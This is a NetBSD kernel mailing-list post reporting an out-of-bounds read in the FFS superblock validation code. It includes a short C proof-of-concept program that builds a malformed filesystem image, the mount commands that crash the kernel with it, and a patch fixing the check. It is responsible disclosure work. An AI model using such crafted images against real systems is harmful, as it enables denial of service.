FFS: wrong superblock check ~> crash

To: tech-kern%netbsd.org@localhost
Subject: FFS: wrong superblock check ~> crash
From: Maxime Villard <max%M00nBSD.net@localhost>
Date: 2014年10月20日 15:38:11 +0200

Probably with the conviction I would find some bugs I opened ffs/ffs_vfsops.c
and something immediately stroke me:
918		error = bread(devvp, sblock_try[i] / DEV_BSIZE, SBLOCKSIZE, cred,
919			 0, &bp);
SBLOCKSIZE (=8192) bytes are read on the disk and put into bp->b_data
(allocated).
924		fs = (struct fs*)bp->b_data;
...
939			sbsize = fs->fs_sbsize;
'sbsize' is set to a value that was read on the disk.
976		/* Validate size of superblock */
977		if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
978			continue;
Basic sanity checks. MAXBSIZE = 64 * 1024.
991	fs = kmem_alloc((u_long)sbsize, KM_SLEEP);
992	memcpy(fs, bp->b_data, sbsize);
And then comes this memcpy. The problem here is that the size of b_data is
8192, but the values of sbsize are located in [1376; 65536].
With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.
Exploit:
------------------------------ ffs.c ------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <ufs/ffs/fs.h>
#define MAXBSIZE (64 * 1024)
int main() {
	struct fs fs;
	char byte[65536] = "";
	FILE *f;
	memset(&fs, 0, sizeof(fs));
	fs.fs_magic = FS_UFS1_MAGIC;
	fs.fs_sbsize = MAXBSIZE-1;
	fs.fs_bsize = MAXBSIZE-1;
	fs.fs_sblockloc = 1024;
	f = fopen("ffs.img", "w");
	fwrite(&fs, sizeof(fs), 1, f);
	fwrite(&byte, 1, 65536 - sizeof(fs), f);
	fclose(f);
	return 0;
}
# ./ffs
# vnconfig vnd0d ffs.img
# mount /dev/vnd0d /mnt
-> crash
-------------------------------------------------------------------
I think the sanity check should be:
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c	24 May 2014 16:34:04 -0000	1.299
+++ ffs_vfsops.c	20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
 			continue;
 
 		/* Validate size of superblock */
-		if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+		if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
 			continue;
 
 		/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?

Follow-Ups:
- Re: FFS: wrong superblock check ~> crash
  - From: David Holland
- Re: FFS: wrong superblock check ~> crash
  - From: Manuel Bouyer
- Re: FFS: wrong superblock check ~> crash
  - From: J. Hannken-Illjes

Prev by Date: Re: Unreleased vnode in linux_sys_uselib()
Next by Date: Re: FFS: wrong superblock check ~> crash
Previous by Thread: Unreleased vnode in linux_sys_uselib()
Next by Thread: Re: FFS: wrong superblock check ~> crash
Indexes:

Home | Main Index | Thread Index | Old Index